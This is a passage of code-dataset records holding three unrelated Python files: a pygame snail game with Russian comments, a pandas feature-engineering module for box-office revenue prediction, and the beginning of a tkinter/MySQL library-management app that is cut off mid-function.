1.4),\n int(image_play.get_height() // 1.4)))\n image_options = pygame.transform.scale(image_options, (int(image_options.get_width() // 1.4),\n int(image_options.get_height() // 1.4)))\n image_quit = pygame.transform.scale(image_quit, (int(image_quit.get_width() // 1.4),\n int(image_quit.get_height() // 1.4)))\n image_about = image_quit\n\n # Настраиваем текст\n PLAY_BUTTON = Button(image=image_play, pos=(W // 2, 200), text_input=\"PLAY\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n OPTIONS_BUTTON = Button(image=image_options, pos=(W // 2, 300), text_input=\"OPTIONS\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n ABOUT_BUTTON = Button(image=image_about, pos=(W // 2, 400), text_input=\"ABOUT\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n QUIT_BUTTON = Button(image=image_quit, pos=(W // 2, 500), text_input=\"QUIT\",\n font=get_font(35), base_color=\"#d7fcd4\", hovering_color=\"White\")\n VERSION_BUTTON = Button(image=None, pos=(W - 50, H - 10), text_input=f\"v_{VERSION_of_program}\",\n font=get_font(15), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n SCREEN.blit(MENU_TEXT, MENU_RECT)\n\n for button in [PLAY_BUTTON, OPTIONS_BUTTON, 
ABOUT_BUTTON, QUIT_BUTTON, VERSION_BUTTON]:\n button.changeColor(MENU_MOUSE_POS)\n button.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n play() # Сначала инициализируем разговорное окно, после функцию july_game()\n # july_game(is_jump, jump_count)\n if OPTIONS_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n options()\n if ABOUT_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n about()\n if QUIT_BUTTON.checkForInput(MENU_MOUSE_POS):\n pygame.quit()\n sys.exit()\n if VERSION_BUTTON.checkForInput(MENU_MOUSE_POS):\n sound_menu.play()\n eam()\n\n pygame.display.update()\n\n\n#########################################################\n# Первый уровень\n\nballs_data = ({'path': 'ball_snowduck.png', 'score': game_score_plus},\n {'path': 'ball_stick1.png', 'score': game_score_minus},\n {'path': 'ball_stick2.png', 'score': game_score_max_minus})\n# поочередно загружаем каждую иконку\nballs_surf = [pygame.image.load('images/' + data['path']).convert_alpha() for data in balls_data]\n\nballs = pygame.sprite.Group()\n\n\n\n\ndef createBall(group):\n a_randint = H * 0.6\n b_randint = H // 1.2\n indx = randint(0, len(balls_surf) - 1)\n y = randint(a_randint, b_randint)\n speed = randint(12, 14*multiplier_speed)\n\n return Ball(y, speed, balls_surf[indx], balls_data[indx]['score'], group)\n\n\ncreateBall(balls)\nspeed = 10\n\n\ndef collideBalls():\n global game_score\n for ball in balls:\n # при касании спрайт исчезает, добовляется очки\n if t_rect.collidepoint(ball.rect.midleft):\n sound_collideBalls.play() # звук столкновения\n game_score += ball.score*multiplier_hard_easy\n ball.kill()\n\n\n# Функция самой игры\ndef july_game(is_jump, jump_count):\n while True:\n keys = pygame.key.get_pressed()\n # Кнопка выхода\n game_july_MOUSE_POS = pygame.mouse.get_pos()\n game_july_BACK = Button(image=None, pos=(W - 100, H - 20),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n game_july_BACK.changeColor(game_july_MOUSE_POS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if game_score < 0:\n game_over()\n if game_score >= game_score_max_level:\n play_two()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_july_BACK.checkForInput(game_july_MOUSE_POS):\n main_menu()\n # Генерация спрайтов каждые 2 секунды, за счет таймера событий вначале\n elif event.type == pygame.USEREVENT:\n createBall(balls)\n\n # Если мы не в прыжке и нажимаем Пробел\n if not is_jump:\n if keys[pygame.K_SPACE]:\n is_jump = True\n else:\n if jump_count >= -10:\n # замедляем изменение координаты\n t_rect.y -= (jump_count * abs(jump_count)) * 0.5\n jump_count -= 0.5\n else:\n jump_count = 10\n is_jump = False\n\n # ФОН и СПРАЙТЫ\n SCREEN.blit(bg, (0, 0)) # Отрисовка фона\n balls.draw(SCREEN) # Отрисовка спрайтов\n # ОПЫТ\n SCREEN.blit(score, (5, 5)) # Отрисовка поля опыта с отступом от начала координат\n sc_text = f.render(str(game_score), 1, (94, 138, 14)) # Формирование текста опыта\n SCREEN.blit(sc_text, (25, 15)) # Отрисовка опыта\n # Герой\n SCREEN.blit(snail, t_rect)\n game_july_BACK.update(SCREEN) # Отрисовка кнопки\n pygame.display.update()\n\n clock.tick(FPS)\n\n collideBalls() # Столкновения\n balls.update(W)\n\n\n################################################################\n\nballs_v_data = ({'path': 'branch1.png', 'score': game_score_minus},\n {'path': 
'branch2.png', 'score': game_score_minus-2},\n {'path': 'branch3.png', 'score': game_score_max_minus},\n {'path': 'blueberries.png', 'score': 8})\nballs_v_surf = [pygame.image.load('images/' + data['path']).convert_alpha() for data in balls_v_data]\n\n\ndef createBall_v(group):\n indx = randint(0, len(balls_v_surf) - 1)\n x = randint(20, W - 20)\n speed = randint(1, 4)\n\n return ball_v(x, speed, balls_v_surf[indx], balls_v_data[indx]['score'], group)\n\n\nballs_v = pygame.sprite.Group()\ncreateBall_v(balls_v)\nspeed = 10\n\n\ndef collideBalls_v():\n global game_score_two_level\n for ball in balls_v:\n # при касании спрайт исчезает, добовляется очки\n if t_rect.collidepoint(ball.rect.midleft) or t_rect.collidepoint(ball.rect.midright):\n sound_collideBalls.play() # звук столкновения\n game_score_two_level += ball.score\n ball.kill()\n\n\ngame_score_two_level = 0\n\n\ndef game_level_two():\n # global game_level_two_BACK\n speed = 20\n global snail\n while True:\n\n keys = pygame.key.get_pressed() # Нажатия клавиатуры\n game_level_two_MOUSE_POS = pygame.mouse.get_pos()\n # Движок\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if game_score_two_level < -1:\n play_two()\n if game_score_two_level >= game_score_max_level:\n play_tree()\n # Кнопка выхода\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_level_two_BACK.checkForInput(game_level_two_MOUSE_POS):\n main_menu()\n # Генерация спрайтов каждые 2 секунды, за счет таймера событий вначале\n elif event.type == pygame.USEREVENT:\n createBall_v(balls_v)\n\n # Движение улитки\n if keys[pygame.K_LEFT]:\n t_rect.x -= speed\n snail = snail_to_left\n if t_rect.x < 0:\n t_rect.x = 0\n elif keys[pygame.K_RIGHT]:\n t_rect.x += speed\n snail = snail_to_right\n if t_rect.x > W - t_rect.width:\n t_rect.x = W - t_rect.width\n\n # Фон спрайты\n BG_game_level_two = pygame.image.load(\"images/background_two.jpg\").convert()\n SCREEN.blit(BG_game_level_two, (0, 0))\n balls_v.draw(SCREEN) # Отрисовка спрайтов\n\n # Кнопка выхода\n game_level_two_BACK = Button(image=None, pos=(W - 100, H - 20),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n game_level_two_BACK.changeColor(game_level_two_MOUSE_POS)\n game_level_two_BACK.update(SCREEN)\n\n # ОПЫТ\n SCREEN.blit(score, (5, 5)) # Отрисовка поля опыта с отступом от начала координат\n sc_text = f.render(str(game_score_two_level), 1, (94, 138, 14)) # Формирование текста опыта\n SCREEN.blit(sc_text, (25, 15)) # Отрисовка опыта\n\n # Герой-улитка\n SCREEN.blit(snail, t_rect)\n pygame.display.update()\n\n collideBalls_v() # Столкновения\n balls_v.update(H)\n\n clock.tick(FPS)\n pygame.display.update() # Обновление экрана\n\n\nmain_menu()\n\n","repo_name":"EAMstudio/game_snail_trip","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":25646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
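Both level loops above wait for pygame.USEREVENT to spawn a new sprite every 2 seconds; the timer itself is configured earlier in main1.py and is not part of this excerpt. A minimal, self-contained sketch of that spawning pattern, with the 2000 ms interval assumed from the comments:

import pygame

pygame.init()
screen = pygame.display.set_mode((640, 480))
clock = pygame.time.Clock()
pygame.time.set_timer(pygame.USEREVENT, 2000)  # post USEREVENT every 2000 ms

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.USEREVENT:
            print('spawn a new ball here')  # createBall(balls) in the real game
    screen.fill((255, 255, 255))
    pygame.display.update()
    clock.tick(60)
pygame.quit()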
+{"seq_id":"13468505325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport ast # Interpret string as Python command\nfrom typing import Tuple\n\ndef extract_names(keyword_list):\n if pd.isna(keyword_list):\n return []\n else:\n return list(map(lambda x: x['name'].replace(' ', '_'), ast.literal_eval(keyword_list)))\n \n\ndef has_top_keyword(keyword_list, top_keywords):\n if not pd.isna(keyword_list):\n list_of_keywords = extract_names(keyword_list)\n for keyword in list_of_keywords:\n if keyword in top_keywords:\n return True\n return False\n\n\ndef extract_has_top_keyword(data: pd.DataFrame) -> Tuple[pd.DataFrame, list]:\n # Get pairs of keyword list + revenue for each movie\n df = data.copy()\n df['Keywords'] = df['Keywords'].map(extract_names, na_action=None)\n df = df[['Keywords', 'revenue']]\n\n keywords_df = (\n pd.DataFrame(df.Keywords.values.tolist())\n .stack()\n .reset_index(level=1, drop=True)\n .to_frame('Keywords')\n )\n df = keywords_df.join(df[['revenue']]).reset_index(drop=True)\n\n # Compute sum and mean revenue for each keyword + count occurences\n def f(x):\n d = {}\n d['revenue_sum'] = x['revenue'].sum()\n d['revenue_mean'] = x['revenue'].mean()\n d['keyword_count'] = len(x['revenue'])\n return pd.Series(d, index=['revenue_sum', 'revenue_mean', 'keyword_count'])\n\n df = (df\n .groupby('Keywords')\n .apply(f)\n .sort_values(['revenue_sum', 'revenue_mean'], ascending=False)\n .reset_index()\n )\n\n # Computing the top x most used percent of keywords without the above high_rev/low_count exotics\n df = df[df.keyword_count >= 5]\n perc_thresh = 70 # chosen so that dataset is balanced\n perc = np.percentile(df.revenue_mean, perc_thresh)\n\n # Generating new column\n top_keywords = list(df[df.revenue_mean >= perc].Keywords)\n\n result_df = data.copy()[['id', 'Keywords']]\n result_df['has_top_keyword'] = result_df[\"Keywords\"].apply(has_top_keyword, args=(top_keywords,))\n\n return result_df.drop(['Keywords'], axis=1), top_keywords\n\n\ndef getTimeFeatures(training_set):\n training_set = training_set.copy()\n releaseDate = pd.to_datetime(training_set['release_date']) \n training_set[\"day\"] = releaseDate.dt.dayofweek\n year = releaseDate.dt.year\n #some years are >2020 --> subtract 100\n year[year>2020] = year[year>2020]-100\n training_set[\"year\"] = year\n training_set[\"age\"] = year.max() - year\n return training_set[['id','day','year','age']]\n\ndef getNumericFeatures(training_set):\n training_set = training_set.copy()\n training_set[\"budgetLog\"] = np.log1p(training_set['budget'])\n training_set[\"PopLog\"] = np.log1p(training_set['popularity'])\n return training_set[['id','budgetLog','PopLog']]\n\ndef getBinaryFeatures(df):\n df = df.copy()\n df[\"hashomepage\"] = ~(df[\"homepage\"].isna())\n df[\"isinCollection\"] = ~(df[\"belongs_to_collection\"].isna())\n df[\"zeroBudget\"] = (df[\"budget\"]==0)\n return df[['id',\"hashomepage\",'isinCollection',\"zeroBudget\"]]\n\ndef getStarFeature(df):\n df = df.copy()\n df.loc[df.cast.isnull(), \"cast\"] = ''\n castList = df.cast.str.strip('[]')\n listOfallActors = pd.Series(pd.Series(list(\", \".join(castList.unique().tolist()).split('}, '))).str.split(\"'name': '\").str[1].str.split(\"'\").str[0].tolist())\n allActors = listOfallActors.value_counts()\n topActors = allActors[allActors>=10].index\n df['hasStar'] = df.cast.apply(lambda row: 1 if any(act in row for act in topActors) else 0)\n df['NumStar']= df.cast.apply(lambda row: sum(act in row for act in topActors))\n 
return df[['id',\"hasStar\",'NumStar']]\n\n#only works for genre at the moment, e.g., tranformListIntoBinaryFeatures(df, \"genre\", 100)\n#also works for spoken_language and production_countries now\n#also work for production_company\ndef tranformListIntoBinaryFeatures(df, feature, treshhold):\n df.list = df[feature].str.strip('[]')\n df.list[df.list.isnull()] = ''\n genres_list = pd.Series(list(set(\", \".join(df.list.unique().tolist()).split('}, ')))).str.split(\"'name': '\").str[1].str.split(\"'\").str[0].tolist()\n \n for x in range(genres_list.count(\"\")):\n genres_list.remove(\"\")\n genres_list=['missing' if x is np.nan else x for x in genres_list]\n \n genres_list_trimmed = genres_list.copy()\n for genre in genres_list:\n df[genre] = df[feature].str.contains(genre)\n df[genre] = df[genre].fillna(False)\n if df[genre].sum(axis = 0) < treshhold :\n genres_list_trimmed.remove(genre)\n #else:\n #print(df[genre].sum(axis = 0))\n #print(genre)\n print(genres_list_trimmed)\n df[\"numberCount\"] = df[genres_list].sum(axis = 1)\n return df[['id',\"numberCount\"]+genres_list_trimmed].copy()\n","repo_name":"Cruzzor/BoxOffice","sub_path":"common/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
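A quick usage sketch for the keyword helpers above. The import path follows the repo layout (common/features.py) and the keyword string mimics the stringified TMDB format the module expects; both are assumptions for illustration:

from common.features import extract_names, has_top_keyword

# stringified list of dicts, as stored in the raw 'Keywords' column
kw = "[{'id': 4379, 'name': 'time travel'}, {'id': 9951, 'name': 'alien'}]"

print(extract_names(kw))                         # ['time_travel', 'alien']
print(has_top_keyword(kw, ['time_travel']))      # True
print(has_top_keyword(float('nan'), ['alien']))  # False (NaN-safe)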
+{"seq_id":"18948293639","text":"from tkinter import *\r\nfrom random import choice\r\nfrom tkinter import Toplevel, ttk, messagebox , filedialog\r\nfrom tkinter.ttk import Treeview\r\nimport mysql.connector as mysql\r\nimport PIL\r\nfrom PIL import ImageTk, Image\r\nfrom pandas import *\r\n\r\n\r\ndef libraryDB():\r\n def connectDB():\r\n def connmysql():\r\n global mycursor\r\n global con\r\n host = hostvalue.get()\r\n user = uservalue.get()\r\n password = passvalue.get()\r\n try:\r\n con = mysql.connect(host=host, user=user, passwd=password)\r\n mycursor = con.cursor()\r\n\r\n except:\r\n messagebox.showerror('Error!', 'Please Try Again')\r\n return\r\n try:\r\n mycursor.execute('create database librarymanagement')\r\n mycursor.execute('use librarymanagement')\r\n mycursor.execute('create table library(student_id int(8) not null primary key,student_name varchar(30),book_name varchar(30),book_id varchar(10), author_name varchar(30),borrow_date varchar(20),return_date varchar(20))')\r\n messagebox.showinfo('Success!', 'Created and Connected to the Database Successfully!', parent=codb)\r\n except:\r\n mycursor.execute('use librarymanagement')\r\n messagebox.showinfo('Success!', 'Connected to the Database Successfully!', parent=codb)\r\n \r\n codb.destroy()\r\n\r\n \r\n codb = Toplevel(master=root)\r\n codb.title(\"Enter Credentials\")\r\n codb.grab_set()\r\n codb.resizable(False, False)\r\n codb.geometry(\"450x450+800+230\")\r\n codb.config(bg=\"black\")\r\n ####MYSQL HOST STUFFS####\r\n \r\n head = \"ZESCA\"\r\n headLabel = Label(codb, text=head, bg=\"#000000\", fg=\"#eec94c\", font=(\r\n 'Elianto', 40, ), )\r\n headLabel.place(x=26, y=20)\r\n \r\n hostvalue = StringVar()\r\n hostLabel = Label(codb, text=\"Enter Host: \", font=('Hero', 15 ),\r\n fg='#EEC94C',bg='#000000', relief=FLAT, width=15, anchor='n')\r\n hostLabel.place(x=10, y=130)\r\n hostEntry = Entry(codb, font=('Hero', 15), textvariable=hostvalue)\r\n hostEntry.place(x=200, y=130)\r\n\r\n ####MYSQL USER STUFFS##\r\n uservalue = StringVar()\r\n userLabel = Label(codb, text=\"Enter User: \", font=('Hero', 15),\r\n fg='#EEC94C',bg='#000000', relief=FLAT, width=15, anchor='n')\r\n userLabel.place(x=10, y=190)\r\n userEntry = Entry(codb, font=('Hero', 15), textvariable=uservalue)\r\n userEntry.place(x=200, y=190)\r\n\r\n ####MYSQL PASSWORD####\r\n passvalue = StringVar()\r\n passLabel = Label(codb, text=\"Enter Password: \", font=(\r\n 'Hero', 15), fg='#EEC94C',bg='#000000', relief=FLAT, width=15,anchor='n')\r\n passLabel.place(x=10, y=260)\r\n passEntry = Entry(codb, font=('Hero', 15),\r\n textvariable=passvalue,show = '*')\r\n passEntry.place(x=200, y=260)\r\n\r\n ####SUBMIT BUTTOM####\r\n submitButton = Button(codb, text=\"Connect\", font=('Hero', 15), bg='#EEC94C', relief=FLAT,\r\n width=8, activebackground='red', activeforeground='white', command=connmysql)\r\n submitButton.place(x=160, y=320)\r\n \r\n\r\n\r\n def addData():\r\n def addDB():\r\n studentid = idvalue.get()\r\n studentname = namevalue.get()\r\n bookname = bnvalue.get()\r\n bookid = bidvalue.get()\r\n authorname = authvalue.get()\r\n borrowdate = bdvalue.get()\r\n returndate = rdvalue.get()\r\n try:\r\n ss = 'insert into library values(%s,%s,%s,%s,%s,%s,%s)'\r\n mycursor.execute(ss, (studentid, studentname, bookname, bookid, authorname, borrowdate, returndate))\r\n con.commit()\r\n ans = messagebox.askyesnocancel('Success!', 'Data Added Successfully!! 
, Do you want to clear the form?', parent=adddb)\r\n if (ans == True):\r\n idvalue.set('')\r\n namevalue.set('')\r\n bnvalue.set('')\r\n bidvalue.set('')\r\n authvalue.set('')\r\n bdvalue.set('')\r\n rdvalue.set('')\r\n except:\r\n messagebox.showerror('Error!', 'Admn No already exists , Please try again', parent=adddb)\r\n mycursor.execute('select * from library')\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n adddb = Toplevel(master=dataEntryFrame)\r\n adddb.title(\"Add Student's Data\")\r\n adddb.config(bg='yellow')\r\n adddb.grab_set()\r\n adddb.resizable(False, False)\r\n adddb.geometry(\"470x470+220+200\")\r\n ####DATA STUFFS####\r\n\r\n ### Admn No DETAILS ###\r\n idvalue = StringVar()\r\n idLabel = Label(adddb, text=\"Enter Admn No: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n idLabel.place(x=10, y=10)\r\n idEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=idvalue)\r\n idEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n namevalue = StringVar()\r\n nameLabel = Label(adddb, text=\"Enter Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n nameLabel.place(x=10, y=70)\r\n nameEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=namevalue)\r\n nameEntry.place(x=230, y=70)\r\n\r\n ### Book Name DETAILS ###\r\n bnvalue = StringVar()\r\n bnLabel = Label(adddb, text=\"Enter Book Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bnLabel.place(x=10, y=130)\r\n bnEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=bnvalue)\r\n bnEntry.place(x=230, y=130)\r\n\r\n ### Book ID DETAILS ###\r\n bidvalue = StringVar()\r\n bidLabel = Label(adddb, text=\"Enter Book ID: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bidLabel.place(x=10, y=190)\r\n bidEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=bidvalue)\r\n bidEntry.place(x=230, y=190)\r\n\r\n ### Author Name DETAILS ###\r\n authvalue = StringVar()\r\n authLabel = Label(adddb, text=\"Enter Author Name: \", font=('Helvetica', 15, 'italic bold'),\r\n bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n authLabel.place(x=10, y=250)\r\n authEntry = Entry(adddb, font=('Helvetica', 15, 'italic bold'),\r\n bd=5, textvariable=authvalue)\r\n authEntry.place(x=230, y=250)\r\n\r\n ### Borrow Date DETAILS ###\r\n bdvalue = StringVar()\r\n bdLabel = Label(adddb, text=\"Enter Borrow Date: \", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n bdLabel.place(x=10, y=310)\r\n bdEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=bdvalue)\r\n bdEntry.place(x=230, y=310)\r\n\r\n ### Return Date DETIALS ###\r\n rdvalue = StringVar()\r\n rdLabel = Label(adddb, text=\"Enter Return Date: \", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='dark violet', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n rdLabel.place(x=10, y=370)\r\n rdEntry = Entry(adddb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=rdvalue)\r\n 
rdEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n subButton = Button(adddb, text=\"Submit\", font=('Helvetica', 15, 'italic bold'), bg='dark violet', relief=RIDGE,\r\n width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white', command=addDB)\r\n subButton.place(x=180, y=410)\r\n adddb.mainloop()\r\n\r\n\r\n def showData():\r\n try:\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n except:\r\n messagebox.showinfo('Error!','Please Connect to the Database!')\r\n\r\n def searchData():\r\n def searchsql():\r\n studentid = sidvalue.get()\r\n studentname = snamevalue.get()\r\n bookname = sbnvalue.get()\r\n bookid = sbidvalue.get()\r\n authorname = sauthvalue.get()\r\n borrowdate = sbdvalue.get()\r\n returndate = srnvalue.get()\r\n \r\n if (studentid != ''):\r\n command = 'select * from library where student_id = %s'\r\n mycursor.execute(command, (studentid, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n \r\n elif (studentname != ''):\r\n command = 'select * from library where student_name = %s'\r\n mycursor.execute(command, (studentname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (bookname != ''):\r\n command = 'select * from library where book_name = %s'\r\n mycursor.execute(command, (bookname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (bookid != ''):\r\n command = 'select * from library where book_id = %s'\r\n mycursor.execute(command, (bookid, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (authorname != ''):\r\n command = 'select * from library where author_name = %s'\r\n mycursor.execute(command, (authorname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (borrowdate != ''):\r\n command = 'select * from library where borrow_date = %s'\r\n mycursor.execute(command, (borrowdate, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (returndate != ''):\r\n command = 'select * from library where return_date = %s'\r\n mycursor.execute(command, (returndate, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n searchdb = Toplevel(master=dataEntryFrame)\r\n 
searchdb.title(\"Search Book's Data\")\r\n searchdb.config(bg='maroon2')\r\n searchdb.grab_set()\r\n searchdb.resizable(False, False)\r\n searchdb.geometry(\"470x470+220+200\")\r\n ####DATA STUFFS####\r\n\r\n ### Admn No DETAILS ###\r\n sidvalue = StringVar()\r\n sidLabel = Label(searchdb, text=\"Search Admn No:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sidLabel.place(x=10, y=10)\r\n sidEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sidvalue)\r\n sidEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n snamevalue = StringVar()\r\n snameLabel = Label(searchdb, text=\"Search Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n snameLabel.place(x=10, y=70)\r\n snameEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=snamevalue)\r\n snameEntry.place(x=230, y=70)\r\n\r\n ### Book Name DETAILS ###\r\n sbnvalue = StringVar()\r\n sbnLabel = Label(searchdb, text=\"Search Book Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbnLabel.place(x=10, y=130)\r\n sbnEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbnvalue)\r\n sbnEntry.place(x=230, y=130)\r\n\r\n ### Book ID DETAILS ###\r\n sbidvalue = StringVar()\r\n sbidLabel = Label(searchdb, text=\"Search Book ID:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbidLabel.place(x=10, y=190)\r\n sbidEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbidvalue)\r\n sbidEntry.place(x=230, y=190)\r\n\r\n ### Author Name DETAILS ###\r\n sauthvalue = StringVar()\r\n sauthLabel = Label(searchdb, text=\"Search Author Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sauthLabel.place(x=10, y=250)\r\n sauthEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sauthvalue)\r\n sauthEntry.place(x=230, y=250)\r\n\r\n ### Borrow Date DETAILS ###\r\n sbdvalue = StringVar()\r\n sbdLabel = Label(searchdb, text=\"Search Borrow Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbdLabel.place(x=10, y=310)\r\n sbdEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbdvalue)\r\n sbdEntry.place(x=230, y=310)\r\n\r\n ### Return Date DETIALS ###\r\n srnvalue = StringVar()\r\n srnLabel = Label(searchdb, text=\"Search Return Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n srnLabel.place(x=10, y=370)\r\n srnEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=srnvalue)\r\n srnEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n ssubButton = Button(searchdb, text=\"Search\", font=('Helvetica', 15, 'italic bold'), bg='blue2', relief=RIDGE,\r\n width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white', command=searchsql)\r\n ssubButton.place(x=180, y=410)\r\n searchdb.mainloop()\r\n pass\r\n\r\n\r\n def updateData():\r\n\r\n def update():\r\n studentid = uidvalue.get()\r\n studentname = unamevalue.get()\r\n bookname = ubnvalue.get()\r\n bookid = ubidvalue.get()\r\n authorname = uauthvalue.get()\r\n borrowdate = 
ubdvalue.get()\r\n returndate = urdvalue.get()\r\n try:\r\n command = 'update library set student_name=%s,book_name=%s,book_id=%s,author_name=%s,borrow_date=%s,return_date=%s where student_id=%s'\r\n mycursor.execute(command,(studentname,bookname,bookid,authorname,borrowdate,returndate,studentid, ))\r\n con.commit()\r\n messagebox.showinfo('Success!','Updated Successfully!')\r\n updatedb.destroy()\r\n\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n except:\r\n messagebox.showinfo('Error!','Please Connect to the Database!')\r\n\r\n updatedb = Toplevel(master=dataEntryFrame)\r\n updatedb.title(\"Update Library's Data\")\r\n updatedb.config(bg='gold2')\r\n updatedb.grab_set()\r\n updatedb.resizable(False, False)\r\n updatedb.geometry(\"470x470+220+200\")\r\n\r\n ### Admn No DETAILS ###\r\n uidvalue = StringVar()\r\n uidLabel = Label(updatedb, text=\"Update Admn No:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n 